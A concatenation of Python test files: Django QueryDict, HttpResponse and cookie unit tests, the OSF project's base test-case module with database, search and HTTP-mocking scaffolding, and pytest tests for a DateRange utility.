        q['next'] = '/a&b/'
        self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
        self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
        # Non-ASCII values are encoded as UTF-8 before escaping.
        q = QueryDict('', mutable=True)
        q['next'] = u'/t\xebst&key/'
        self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
        self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')
    def test_mutable_copy(self):
        """A copy of a QueryDict is mutable."""
        q = QueryDict('').copy()
        self.assertRaises(KeyError, q.__getitem__, "foo")
        q['name'] = 'john'
        self.assertEqual(q['name'], 'john')
    def test_mutable_delete(self):
        """del works on a mutable copy and removes the key."""
        q = QueryDict('').copy()
        q['name'] = 'john'
        del q['name']
        self.assertFalse('name' in q)
    def test_basic_mutable_operations(self):
        """Full mutation API on a mutable copy: setlist, appendlist,
        update (which appends rather than replaces), pop, setdefault, clear."""
        q = QueryDict('').copy()
        q['name'] = 'john'
        self.assertEqual(q.get('foo', 'default'), 'default')
        self.assertEqual(q.get('name', 'default'), 'john')
        self.assertEqual(q.getlist('name'), ['john'])
        self.assertEqual(q.getlist('foo'), [])
        q.setlist('foo', ['bar', 'baz'])
        # Plain subscript/get return the LAST value of a multi-valued key.
        self.assertEqual(q.get('foo', 'default'), 'baz')
        self.assertEqual(q.getlist('foo'), ['bar', 'baz'])
        q.appendlist('foo', 'another')
        self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
        self.assertEqual(q['foo'], 'another')
        self.assertTrue(q.has_key('foo'))
        self.assertTrue('foo' in q)
        self.assertEqual(q.items(), [(u'foo', u'another'), (u'name', u'john')])
        self.assertEqual(q.lists(), [(u'foo', [u'bar', u'baz', u'another']), (u'name', [u'john'])])
        self.assertEqual(q.keys(), [u'foo', u'name'])
        self.assertEqual(q.values(), [u'another', u'john'])
        self.assertEqual(len(q), 2)
        # update() appends to the existing value list, dict-style replace it is not.
        q.update({'foo': 'hello'})
        self.assertEqual(q['foo'], 'hello')
        self.assertEqual(q.get('foo', 'not available'), 'hello')
        self.assertEqual(q.getlist('foo'), [u'bar', u'baz', u'another', u'hello'])
        self.assertEqual(q.pop('foo'), [u'bar', u'baz', u'another', u'hello'])
        self.assertEqual(q.pop('foo', 'not there'), 'not there')
        self.assertEqual(q.get('foo', 'not there'), 'not there')
        self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
        self.assertEqual(q['foo'], 'bar')
        self.assertEqual(q.getlist('foo'), ['bar'])
        self.assertEqual(q.urlencode(), 'foo=bar&name=john')
        q.clear()
        self.assertEqual(len(q), 0)
    def test_multiple_keys(self):
        """Test QueryDict with two key/value pairs with same keys.

        The dict is created immutable, so every mutating method must raise
        AttributeError.
        """
        q = QueryDict('vote=yes&vote=no')
        # Item access returns the last value for a repeated key.
        self.assertEqual(q['vote'], u'no')
        self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
        self.assertEqual(q.get('vote', 'default'), u'no')
        self.assertEqual(q.get('foo', 'default'), 'default')
        self.assertEqual(q.getlist('vote'), [u'yes', u'no'])
        self.assertEqual(q.getlist('foo'), [])
        self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
        self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
        self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
        self.assertEqual(q.has_key('vote'), True)
        self.assertEqual('vote' in q, True)
        self.assertEqual(q.has_key('foo'), False)
        self.assertEqual('foo' in q, False)
        self.assertEqual(q.items(), [(u'vote', u'no')])
        self.assertEqual(q.lists(), [(u'vote', [u'yes', u'no'])])
        self.assertEqual(q.keys(), [u'vote'])
        self.assertEqual(q.values(), [u'no'])
        self.assertEqual(len(q), 1)
        self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
        self.assertRaises(AttributeError, q.pop, 'foo')
        self.assertRaises(AttributeError, q.popitem)
        self.assertRaises(AttributeError, q.clear)
        self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
        self.assertRaises(AttributeError, q.__delitem__, 'vote')
    def test_invalid_input_encoding(self):
        """
        QueryDicts must be able to handle invalid input encoding (in this
        case, bad UTF-8 encoding): undecodable bytes become U+FFFD.
        """
        q = QueryDict('foo=bar&foo=\xff')
        self.assertEqual(q['foo'], u'\ufffd')
        self.assertEqual(q.getlist('foo'), [u'bar', u'\ufffd'])
    def test_pickle(self):
        """QueryDicts round-trip through pickle (protocol 2) and compare equal."""
        q = QueryDict('')
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q == q1, True)
        q = QueryDict('a=b&c=d')
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q == q1, True)
        # Repeated keys must survive the round-trip too.
        q = QueryDict('a=b&c=d&a=1')
        q1 = pickle.loads(pickle.dumps(q, 2))
        self.assertEqual(q == q1 , True)
    def test_update_from_querydict(self):
        """Regression test for #8278: QueryDict.update(QueryDict)

        Updating from another QueryDict must append all values, not replace.
        """
        x = QueryDict("a=1&a=2", mutable=True)
        y = QueryDict("a=3&a=4")
        x.update(y)
        self.assertEqual(x.getlist('a'), [u'1', u'2', u'3', u'4'])
    def test_non_default_encoding(self):
        """#13572 - QueryDict with a non-default encoding"""
        # rot_13 decodes 'sbb=one' to 'foo=bar'; urlencode() re-encodes.
        q = QueryDict('sbb=one', encoding='rot_13')
        self.assertEqual(q.encoding , 'rot_13' )
        self.assertEqual(q.items() , [(u'foo', u'bar')] )
        self.assertEqual(q.urlencode() , 'sbb=one' )
        # The encoding must be preserved by copy() and the copy module.
        q = q.copy()
        self.assertEqual(q.encoding , 'rot_13' )
        self.assertEqual(q.items() , [(u'foo', u'bar')] )
        self.assertEqual(q.urlencode() , 'sbb=one' )
        self.assertEqual(copy.copy(q).encoding , 'rot_13' )
        self.assertEqual(copy.deepcopy(q).encoding , 'rot_13')
class HttpResponseTests(unittest.TestCase):
    """Header coercion and content handling for HttpResponse (Python 2 era)."""
    def test_unicode_headers(self):
        r = HttpResponse()
        # If we insert a unicode value it will be converted to an ascii str.
        r['value'] = u'test value'
        self.assertTrue(isinstance(r['value'], str))
        # An error is raised when a unicode object with non-ascii is assigned.
        self.assertRaises(UnicodeEncodeError, r.__setitem__, 'value', u't\xebst value')
        # An error is raised when a unicode object with non-ASCII format is
        # passed as initial mimetype or content_type.
        self.assertRaises(UnicodeEncodeError, HttpResponse,
                content_type=u't\xebst value')
        # HttpResponse headers must be convertible to ASCII.
        # NOTE(review): this assertion duplicates the previous one
        # (both pass content_type) -- one was presumably meant to use the
        # legacy `mimetype` keyword; confirm against upstream history.
        self.assertRaises(UnicodeEncodeError, HttpResponse,
                content_type=u't\xebst value')
        # The response also converts unicode keys to strings.
        r[u'test'] = 'testing key'
        l = list(r.items())
        l.sort()
        self.assertEqual(l[1], ('test', 'testing key'))
        # It will also raise errors for keys with non-ascii data.
        self.assertRaises(UnicodeEncodeError, r.__setitem__, u't\xebst key', 'value')
    def test_newlines_in_headers(self):
        # Bug #10188: Do not allow newlines in headers (CR or LF)
        r = HttpResponse()
        self.assertRaises(BadHeaderError, r.__setitem__, 'test\rstr', 'test')
        self.assertRaises(BadHeaderError, r.__setitem__, 'test\nstr', 'test')
    def test_dict_behavior(self):
        """
        Test for bug #14020: Make HttpResponse.get work like dict.get
        """
        r = HttpResponse()
        self.assertEqual(r.get('test'), None)
    def test_non_string_content(self):
        # Bug 16494: HttpResponse should behave consistently with non-strings
        r = HttpResponse(12345)
        self.assertEqual(r.content, '12345')
        # test content via property
        r = HttpResponse()
        r.content = 12345
        self.assertEqual(r.content, '12345')
    def test_iter_content(self):
        r = HttpResponse(['abc', 'def', 'ghi'])
        self.assertEqual(r.content, 'abcdefghi')
        # test iter content via property
        r = HttpResponse()
        r.content = ['idan', 'alex', 'jacob']
        self.assertEqual(r.content, 'idanalexjacob')
        r = HttpResponse()
        r.content = [1, 2, 3]
        self.assertEqual(r.content, '123')
        # test retrieval explicitly using iter and odd inputs
        r = HttpResponse()
        r.content = ['1', u'2', 3, unichr(1950)]
        result = []
        my_iter = r.__iter__()
        while True:
            try:
                result.append(next(my_iter))
            except StopIteration:
                break
        # '\xde\x9e' == unichr(1950).encode('utf-8')
        self.assertEqual(result, ['1', '2', '3', '\xde\x9e'])
        self.assertEqual(r.content, '123\xde\x9e')
        # with Content-Encoding header the content must stay raw bytes,
        # so non-ascii unicode cannot be encoded implicitly.
        r = HttpResponse([1,1,2,4,8])
        r['Content-Encoding'] = 'winning'
        self.assertEqual(r.content, '11248')
        r.content = [unichr(1950),]
        self.assertRaises(UnicodeEncodeError,
                        getattr, r, 'content')
class CookieTests(unittest.TestCase):
    """Cookie encoding/decoding and parse_cookie robustness."""
    def test_encode(self):
        """
        Test that we don't output tricky characters in encoded value
        """
        c = SimpleCookie()
        c['test'] = "An,awkward;value"
        self.assertTrue(";" not in c.output().rstrip(';')) # IE compat
        self.assertTrue("," not in c.output().rstrip(';')) # Safari compat
    def test_decode(self):
        """
        Test that we can still preserve semi-colons and commas
        """
        c = SimpleCookie()
        c['test'] = "An,awkward;value"
        c2 = SimpleCookie()
        c2.load(c.output())
        self.assertEqual(c['test'].value, c2['test'].value)
    def test_decode_2(self):
        """
        Test that we haven't broken normal encoding
        """
        c = SimpleCookie()
        c['test'] = "\xf0"
        c2 = SimpleCookie()
        c2.load(c.output())
        self.assertEqual(c['test'].value, c2['test'].value)
    def test_nonstandard_keys(self):
        """
        Test that a single non-standard cookie name doesn't affect all cookies. Ticket #13007.
        """
        self.assertTrue('good_cookie' in parse_cookie('good_cookie=yes;bad:cookie=yes').keys())
    def test_repeated_nonstandard_keys(self):
        """
        Test that a repeated non-standard name doesn't affect all cookies. Ticket #15852
        """
        self.assertTrue('good_cookie' in parse_cookie('a,=b; a,=c; good_cookie=yes').keys())
    def test_httponly_after_load(self):
        """
        Test that we can use httponly attribute on cookies that we load
        """
        c = SimpleCookie()
        c.load("name=val")
        c['name']['httponly'] = True
        self.assertTrue(c['name']['httponly'])
| |
# -*- coding: utf-8 -*-
'''Base TestCase class for OSF unittests. Uses a temporary MongoDB database.'''
import abc
import datetime as dt
import functools
import logging
import re
import unittest
import uuid
import blinker
import httpretty
import mock
import pytest
from django.test.utils import override_settings
from django.test import TestCase as DjangoTestCase
from faker import Factory
from framework.auth.core import Auth
from framework.celery_tasks.handlers import celery_before_request
from framework.django.handlers import handlers as django_handlers
from framework.flask import rm_handlers
from osf.models import MetaSchema
from website import settings
from website.app import init_app
from website.notifications.listeners import (subscribe_contributor,
subscribe_creator)
from website.project.model import ensure_schemas
from website.project.signals import contributor_added, project_created
from website.project.views.contributor import notify_added_contributor
from website.signals import ALL_SIGNALS
from webtest_plus import TestApp
from .json_api_test_app import JSONAPITestApp
from nose.tools import * # noqa (PEP8 asserts); noqa (PEP8 asserts)
logger = logging.getLogger(__name__)
def get_default_metaschema():
    """Return the first MetaSchema, creating all schemas on demand.

    This needs to be a method so it gets called after the test database
    is set up.
    """
    try:
        return MetaSchema.find()[0]
    except IndexError:
        # No schemas exist yet in the scratch database -- create and retry.
        ensure_schemas()
        return MetaSchema.find()[0]
# Build the Flask app once at import time; re-registering routes on a
# second import raises AssertionError, in which case we skip route setup.
try:
    test_app = init_app(routes=True, set_backends=False)
except AssertionError:  # Routes have already been set up
    test_app = init_app(routes=False, set_backends=False)
# Django-style request handlers interfere with the test client; strip them.
rm_handlers(test_app, django_handlers)
test_app.testing = True
# Silence some 3rd-party logging and some "loud" internal loggers
SILENT_LOGGERS = [
    'api.caching.tasks',
    'factory.generate',
    'factory.containers',
    'framework.analytics',
    'framework.auth.core',
    'framework.celery_tasks.signals',
    'website.app',
    'website.archiver.tasks',
    'website.mails',
    'website.notifications.listeners',
    'website.search.elastic_search',
    'website.search_migration.migrate',
    'website.util.paths',
    'requests_oauthlib.oauth2_session',
    'raven.base.Client',
    'raven.contrib.django.client.DjangoClient',
]
for logger_name in SILENT_LOGGERS:
    logging.getLogger(logger_name).setLevel(logging.CRITICAL)
# Shared Faker instance used by tests to generate fake data.
fake = Factory.create()
@pytest.mark.django_db
class DbTestCase(unittest.TestCase):
    """Base `TestCase` for tests that require a scratch database.

    Disables email subscriptions and lowers bcrypt cost for speed; both
    settings are restored in tearDownClass.
    """
    @classmethod
    def setUpClass(cls):
        super(DbTestCase, cls).setUpClass()
        cls._original_enable_email_subscriptions = settings.ENABLE_EMAIL_SUBSCRIPTIONS
        settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
        cls._original_bcrypt_log_rounds = settings.BCRYPT_LOG_ROUNDS
        # Cheap hashing: tests create many users and don't need security.
        settings.BCRYPT_LOG_ROUNDS = 4
    @classmethod
    def tearDownClass(cls):
        super(DbTestCase, cls).tearDownClass()
        settings.ENABLE_EMAIL_SUBSCRIPTIONS = cls._original_enable_email_subscriptions
        settings.BCRYPT_LOG_ROUNDS = cls._original_bcrypt_log_rounds
class AppTestCase(unittest.TestCase):
    """Base `TestCase` for OSF tests that require the WSGI app (but no database).

    Pushes a fake request context for each test (unless PUSH_CONTEXT is
    False) and temporarily disconnects noisy signal receivers.
    """
    PUSH_CONTEXT = True
    DISCONNECTED_SIGNALS = {
        # disconnect notify_add_contributor so that add_contributor does not send "fake" emails in tests
        contributor_added: [notify_added_contributor]
    }
    def setUp(self):
        super(AppTestCase, self).setUp()
        self.app = TestApp(test_app)
        if not self.PUSH_CONTEXT:
            return
        # Fixed client address / UA so request-derived data is deterministic.
        self.context = test_app.test_request_context(headers={
            'Remote-Addr': '146.9.219.56',
            'User-Agent': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3'
        })
        self.context.push()
        with self.context:
            celery_before_request()
        for signal in self.DISCONNECTED_SIGNALS:
            for receiver in self.DISCONNECTED_SIGNALS[signal]:
                signal.disconnect(receiver)
    def tearDown(self):
        super(AppTestCase, self).tearDown()
        if not self.PUSH_CONTEXT:
            return
        # Popping the context can trigger mailchimp sync; mock it out.
        with mock.patch('website.mailchimp_utils.get_mailchimp_api'):
            self.context.pop()
        # Reconnect the receivers disconnected in setUp.
        for signal in self.DISCONNECTED_SIGNALS:
            for receiver in self.DISCONNECTED_SIGNALS[signal]:
                signal.connect(receiver)
class ApiAppTestCase(unittest.TestCase):
    """Base `TestCase` for OSF API v2 tests that require the WSGI app (but no database).
    """
    # Allow the Django test runner to hit the database from this case.
    allow_database_queries = True
    def setUp(self):
        super(ApiAppTestCase, self).setUp()
        self.app = JSONAPITestApp()
class SearchTestCase(unittest.TestCase):
    """Creates a throwaway Elasticsearch index per test and deletes it after."""
    def setUp(self):
        # Unique index name so concurrent test runs cannot collide.
        settings.ELASTIC_INDEX = uuid.uuid4().hex
        settings.ELASTIC_TIMEOUT = 60
        from website.search import elastic_search
        elastic_search.INDEX = settings.ELASTIC_INDEX
        elastic_search.create_index(settings.ELASTIC_INDEX)
        # NOTE: Super is called last to ensure the ES connection can be established before
        # the httpretty module patches the socket.
        super(SearchTestCase, self).setUp()
    def tearDown(self):
        super(SearchTestCase, self).tearDown()
        from website.search import elastic_search
        elastic_search.delete_index(settings.ELASTIC_INDEX)
# Every HTTP verb that httpretty can intercept; used to block outbound traffic.
methods = [
    httpretty.GET,
    httpretty.PUT,
    httpretty.HEAD,
    httpretty.POST,
    httpretty.PATCH,
    httpretty.DELETE,
]
def kill(*args, **kwargs):
    # Catch-all httpretty body: any unmocked outbound request fails loudly.
    # NOTE(review): 'httppretty' in the log message is a typo for 'httpretty'.
    logger.error('httppretty.kill: %s - %s', args, kwargs)
    raise httpretty.errors.UnmockedError()
class MockRequestTestCase(unittest.TestCase):
    """Optionally blocks ALL outgoing HTTP requests during a test.

    When DISABLE_OUTGOING_CONNECTIONS is True, every request to any URL is
    routed to `kill`, which raises UnmockedError.
    """
    DISABLE_OUTGOING_CONNECTIONS = False
    def setUp(self):
        super(MockRequestTestCase, self).setUp()
        if self.DISABLE_OUTGOING_CONNECTIONS:
            httpretty.enable()
            for method in methods:
                # priority=-1 so explicit per-test mocks win over this catch-all.
                httpretty.register_uri(
                    method,
                    re.compile(r'.*'),
                    body=kill,
                    priority=-1,
                )
    def tearDown(self):
        super(MockRequestTestCase, self).tearDown()
        httpretty.reset()
        httpretty.disable()
class OsfTestCase(DbTestCase, AppTestCase, SearchTestCase, MockRequestTestCase):
    """Base `TestCase` for tests that require both scratch databases and the OSF
    application. Note: superclasses must call `super` in order for all setup and
    teardown methods to be called correctly.
    """
    pass
class ApiTestCase(DbTestCase, ApiAppTestCase, SearchTestCase, MockRequestTestCase):
    """Base `TestCase` for tests that require both scratch databases and the OSF
    API application. Note: superclasses must call `super` in order for all setup and
    teardown methods to be called correctly.
    """
    def setUp(self):
        super(ApiTestCase, self).setUp()
        # API tests never send real mail.
        settings.USE_EMAIL = False
class ApiAddonTestCase(ApiTestCase):
    """Base `TestCase` for tests that require interaction with addons.

    Subclasses must supply `short_name` and `addon_type` (one of
    'CONFIGURABLE', 'OAUTH', 'UNMANAGEABLE', 'INVALID') and implement the
    `_apply_auth_configuration` and `_set_urls` hooks.
    """
    DISABLE_OUTGOING_CONNECTIONS = True
    @abc.abstractproperty
    def short_name(self):
        pass
    @abc.abstractproperty
    def addon_type(self):
        pass
    @abc.abstractmethod
    def _apply_auth_configuration(self):
        pass
    @abc.abstractmethod
    def _set_urls(self):
        pass
    def _settings_kwargs(self, node, user_settings):
        # Default kwargs for building addon node settings in subclasses.
        return {
            'user_settings': self.user_settings,
            'folder_id': '1234567890',
            'owner': self.node
        }
    def setUp(self):
        super(ApiAddonTestCase, self).setUp()
        # Imported here to avoid import-time database access.
        from osf_tests.factories import (
            ProjectFactory,
            AuthUserFactory,
        )
        from addons.base.models import (
            BaseOAuthNodeSettings,
            BaseOAuthUserSettings
        )
        assert self.addon_type in ('CONFIGURABLE', 'OAUTH', 'UNMANAGEABLE', 'INVALID')
        self.account = None
        self.node_settings = None
        self.user_settings = None
        self.user = AuthUserFactory()
        self.auth = Auth(self.user)
        self.node = ProjectFactory(creator=self.user)
        if self.addon_type not in ('UNMANAGEABLE', 'INVALID'):
            if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
                self.account = self.AccountFactory()
                self.user.external_accounts.add(self.account)
                self.user.save()
            self.user_settings = self.user.get_or_add_addon(self.short_name)
            self.node_settings = self.node.get_or_add_addon(self.short_name, auth=self.auth)
            if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
                self.node_settings.set_auth(self.account, self.user)
                self._apply_auth_configuration()
        if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
            assert isinstance(self.node_settings, BaseOAuthNodeSettings)
            assert isinstance(self.user_settings, BaseOAuthUserSettings)
        self.node_settings.reload()
        self.user_settings.reload()
        self.account_id = self.account._id if self.account else None
        # BUG FIX: was `self.set_urls()`, but the abstract hook declared above
        # is `_set_urls`; the public name is never defined anywhere in this
        # class, so the original call raised AttributeError at runtime.
        self._set_urls()
    def tearDown(self):
        super(ApiAddonTestCase, self).tearDown()
        self.user.remove()
        self.node.remove()
        # Settings/account objects only exist for managed addon types.
        if self.node_settings:
            self.node_settings.remove()
        if self.user_settings:
            self.user_settings.remove()
        if self.account:
            self.account.remove()
@override_settings(ROOT_URLCONF='admin.base.urls')
class AdminTestCase(DbTestCase, DjangoTestCase, SearchTestCase, MockRequestTestCase):
    """Base `TestCase` for the OSF admin app; routes URLs through admin.base.urls."""
    pass
class NotificationTestCase(OsfTestCase):
    """An `OsfTestCase` to use when testing specific subscription behavior.
    Use when you'd like to manually create all Node subscriptions and subscriptions
    for added contributors yourself, and not rely on automatically added ones.
    """
    DISCONNECTED_SIGNALS = {
        # disconnect signals so that add_contributor does not send "fake" emails in tests
        contributor_added: [notify_added_contributor, subscribe_contributor],
        project_created: [subscribe_creator]
    }
    # NOTE(review): both overrides below are pure pass-throughs and could be
    # removed; kept for symmetry with sibling test cases.
    def setUp(self):
        super(NotificationTestCase, self).setUp()
    def tearDown(self):
        super(NotificationTestCase, self).tearDown()
class ApiWikiTestCase(ApiTestCase):
    """ApiTestCase with a contributor and a non-contributor user pre-created."""
    def setUp(self):
        from osf_tests.factories import AuthUserFactory
        super(ApiWikiTestCase, self).setUp()
        self.user = AuthUserFactory()
        self.non_contributor = AuthUserFactory()
    def _add_project_wiki_page(self, node, user):
        from addons.wiki.tests.factories import NodeWikiFactory
        # API will only return current wiki pages
        # Mock out update_search. TODO: Remove when StoredFileNode is implemented
        with mock.patch('osf.models.AbstractNode.update_search'):
            return NodeWikiFactory(node=node, user=user)
# From Flask-Security: https://github.com/mattupstate/flask-security/blob/develop/flask_security/utils.py
class CaptureSignals(object):
    """Testing utility for capturing blinker signals.
    Context manager which mocks out selected signals and registers which
    are `sent` on and what arguments were sent. Instantiate with a list of
    blinker `NamedSignals` to patch. Each signal has its `send` mocked out.
    """
    def __init__(self, signals):
        """Patch all given signals and make them available as attributes.
        :param signals: list of signals
        """
        self._records = {}
        self._receivers = {}
        for signal in signals:
            self._records[signal] = []
            self._receivers[signal] = functools.partial(self._record, signal)
    def __getitem__(self, signal):
        """All captured signals are available via `ctxt[signal]`.
        """
        if isinstance(signal, blinker.base.NamedSignal):
            return self._records[signal]
        else:
            # BUG FIX: the original called `super().__setitem__(signal)` --
            # the wrong dunder, with the wrong arity, and without returning.
            # Delegate the lookup to __getitem__ as intended (object defines
            # neither, so a non-NamedSignal key still raises AttributeError).
            return super(CaptureSignals, self).__getitem__(signal)
    def _record(self, signal, *args, **kwargs):
        # Receiver hooked to every patched signal; stores the call args.
        self._records[signal].append((args, kwargs))
    def __enter__(self):
        for signal, receiver in self._receivers.items():
            signal.connect(receiver)
        return self
    def __exit__(self, type, value, traceback):
        for signal, receiver in self._receivers.items():
            signal.disconnect(receiver)
    def signals_sent(self):
        """Return a set of the signals sent.
        :rtype: list of blinker `NamedSignals`.
        """
        return set([signal for signal, _ in self._records.items() if self._records[signal]])
def capture_signals():
    """Factory method that creates a ``CaptureSignals`` with all OSF signals.

    :returns: context manager recording sends on every signal in ALL_SIGNALS.
    """
    return CaptureSignals(ALL_SIGNALS)
def assert_dict_contains_subset(a, b):
    """Assert that every key/value pair of `a` also appears in `b`.

    :param a: the expected subset
    :param b: the dict expected to contain `a`

    The original implementation compared ``set(a.items())`` against
    ``set(b.items())``, which raises TypeError whenever a value is
    unhashable (e.g. a list or dict). Comparing by equality instead keeps
    the same result for hashable values and also supports unhashable ones.
    """
    assert all(k in b and b[k] == v for k, v in a.items())
def assert_is_redirect(response, msg='Response is a redirect.'):
    """Assert that `response` carries a 3xx (redirect) status code."""
    status = response.status_code
    assert status >= 300 and status < 400, msg
def assert_before(lst, item1, item2):
    """Assert that item1 appears before item2 in lst.

    Raises ValueError (from ``list.index``) if either item is missing.

    Fixes two defects of the original: it depended on nose's star-imported
    ``assert_less`` (nose is unmaintained), and its failure message read
    "{item1} appears before {item2}" -- describing success, not the failure.
    """
    assert lst.index(item1) < lst.index(item2), \
        '{0!r} does not appear before {1!r}'.format(item1, item2)
def assert_datetime_equal(dt1, dt2, allowance=500):
    """Assert that two datetimes differ by less than `allowance` milliseconds."""
    tolerance = dt.timedelta(milliseconds=allowance)
    difference = abs(dt1 - dt2)
    assert difference < tolerance
| |
from datetime import datetime as dt, date as d, time as t, timedelta as td
import pytest
from gfit2mfp.utils import DateRange
def test_create_date_range():
    """DateRange stores its constructor arguments as `start` and `end`."""
    obj = DateRange(1, 2)
    assert obj.start == 1
    assert obj.end == 2
@pytest.mark.parametrize(
    'start, end, other_start, other_end',
    # just use ints in this test because writing datetimes is hard work
    [
        # the other date range starts after, ends after
        (2, 4, 3, 5),
        # starts before, ends before
        (2, 4, 1, 3),
        # starts before, ends after
        (2, 4, 1, 5),
        # starts before, ends the exact same time as this one starts
        (2, 4, 1, 2),
        # starts exactly when this one ends, ends after
        (2, 4, 4, 5)
    ]
)
def test_date_ranges_intersect(start, end, other_start, other_end):
    """Overlapping (or just-touching) ranges are `in` each other."""
    obj = DateRange(start, end)
    other = DateRange(other_start, other_end)
    assert other in obj
@pytest.mark.parametrize(
    'start, end, other_start, other_end',
    [
        # other range starts after
        (2, 4, 5, 6),
        # other range ends before
        (2, 4, 0, 1)
    ]
)
def test_date_ranges_dont_intersect(start, end, other_start, other_end):
    """Disjoint ranges are not `in` each other."""
    obj = DateRange(start, end)
    other = DateRange(other_start, other_end)
    assert other not in obj
@pytest.mark.parametrize(
    'start, end, other',
    [
        # date is exactly equal to start
        (dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 5)),
        # date is in the middle
        (dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 7)),
        # date is exactly equal to end
        (dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 10)),
    ]
)
def test_date_ranges_contains_date(start, end, other):
    """A single datetime inside the range is both `in` it and `near` it."""
    obj = DateRange(start, end)
    assert other in obj
    assert obj.near(other)
@pytest.mark.parametrize(
    'start, end, other',
    [
        # date is before
        (dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 1)),
        # date is after
        (dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 12))
    ]
)
def test_date_ranges_not_contains_date(start, end, other):
    """A datetime outside the range is not `in` it."""
    obj = DateRange(start, end)
    assert other not in obj
def test_date_ranges_equal():
    """Ranges with identical endpoints compare equal."""
    obj = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
    other = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
    assert obj == other
def test_hash_is_consistent():
    """Equal ranges hash equal (required for use in sets/dicts)."""
    obj = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
    other = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
    assert hash(obj) == hash(other)
@pytest.mark.parametrize(
    'start, end, other_start, other_end',
    [
        # the other date range just clips the start
        (t(12, 10, 0), t(13, 10, 0), t(12, 0, 0), t(12, 5, 0)),
        # the other date range just clips the end
        (t(12, 10, 0), t(13, 10, 0), t(13, 15, 0), t(13, 20, 0)),
    ]
)
def test_date_ranges_near(start, end, other_start, other_end):
    """Ranges within the `near_time` window (300s here) count as near."""
    date = d(2000, 1, 5)
    obj = DateRange(dt.combine(date, start), dt.combine(date, end))
    other = DateRange(dt.combine(date, other_start), dt.combine(date, other_end))
    obj.near_time = td(seconds=300)
    assert obj.near(other)
@pytest.mark.parametrize(
    'start, end, other_start, other_end',
    [
        # the other date range just misses the start
        (t(12, 10, 0), t(13, 10, 0), t(12, 0, 0), t(12, 4, 59)),
        # the other date range just misses the end
        (t(12, 10, 0), t(13, 10, 0), t(13, 15, 1), t(13, 20, 0))
    ]
)
def test_date_ranges_arent_near(start, end, other_start, other_end):
    """Ranges one second beyond the `near_time` window are not near."""
    date = d(2000, 1, 5)
    obj = DateRange(dt.combine(date, start), dt.combine(date, end))
    other = DateRange(dt.combine(date, other_start), dt.combine(date, other_end))
    obj.near_time = td(seconds=300)
    assert not obj.near(other)
@pytest.mark.parametrize(
    'start, end, other',
    [
        # the other date range just clips the start
        (t(12, 10, 0), t(13, 10, 0), t(12, 5, 0)),
        # the other date range just clips the end
        (t(12, 10, 0), t(13, 10, 0), t(13, 15, 0))
    ]
)
def test_date_ranges_near_date(start, end, other):
    """`near` also accepts a bare datetime within the window."""
    date = d(2000, 1, 5)
    obj = DateRange(dt.combine(date, start), dt.combine(date, end))
    obj.near_time = td(seconds=300)
    assert obj.near(dt.combine(date, other))
@pytest.mark.parametrize(
    'start, end, other',
    [
        # the other date range just misses the start
        (t(12, 10, 0), t(13, 10, 0), t(12, 4, 59)),
        # the other date range just misses the end
        (t(12, 10, 0), t(13, 10, 0), t(13, 15, 1)),
    ]
)
def test_date_ranges_not_near_date(start, end, other):
    """A bare datetime one second outside the window is not near."""
    date = d(2000, 1, 5)
    obj = DateRange(dt.combine(date, start), dt.combine(date, end))
    obj.near_time = td(seconds=300)
    assert not obj.near(dt.combine(date, other))
@pytest.mark.parametrize('val', [d.today(), t(0), 1, '', None])
def test_near_bad_val(val):
    """`near` rejects anything that is not a DateRange or datetime."""
    with pytest.raises(NotImplementedError):
        DateRange(dt(2000, 1, 1), dt(2000, 1, 2)).near(val)
@pytest.mark.parametrize('left, right, less_than',
    [
        # same start, same end
        (DateRange(2, 4), DateRange(2, 4), False),
        # same start, l ends before r
        (DateRange(2, 4), DateRange(2, 5), True),
        # same start, l ends after r
        (DateRange(2, 4), DateRange(2, 3), False),
        # l starts before r, same end
        (DateRange(1, 4), DateRange(2, 4), True),
        # l starts before r, l ends after r
        (DateRange(1, 5), DateRange(2, 4), True),
        # l starts before r, l ends before r
        (DateRange(1, 3), DateRange(2, 4), True),
        # l starts after r, same end
        (DateRange(3, 4), DateRange(2, 4), False),
        # l starts after r, l ends after r
        (DateRange(3, 5), DateRange(2, 4), False),
        # l starts after r, l ends before r
        (DateRange(3, 4), DateRange(2, 5), False),
    ]
)
def test_lt(left, right, less_than):
    """Ordering is by start first, then by end on ties."""
    assert (left < right) == less_than
@pytest.mark.parametrize('left, right, new',
    [
        # equal makes equal
        (DateRange(1, 2), DateRange(1, 2), DateRange(1, 2)),
        # no intersect
        (DateRange(1, 2), DateRange(4, 5), DateRange(1, 5)),
        (DateRange(4, 5), DateRange(1, 2), DateRange(1, 5)),
        # part-overlap
        (DateRange(1, 3), DateRange(2, 4), DateRange(1, 4)),
        (DateRange(2, 4), DateRange(1, 3), DateRange(1, 4)),
    ]
)
def test_combine(left, right, new):
    """combine() yields the smallest range spanning both operands."""
    assert left.combine(right) == new
def test_duration():
    """duration is end minus start."""
    assert DateRange(4, 6).duration == 2
| |
#!/usr/bin/env python
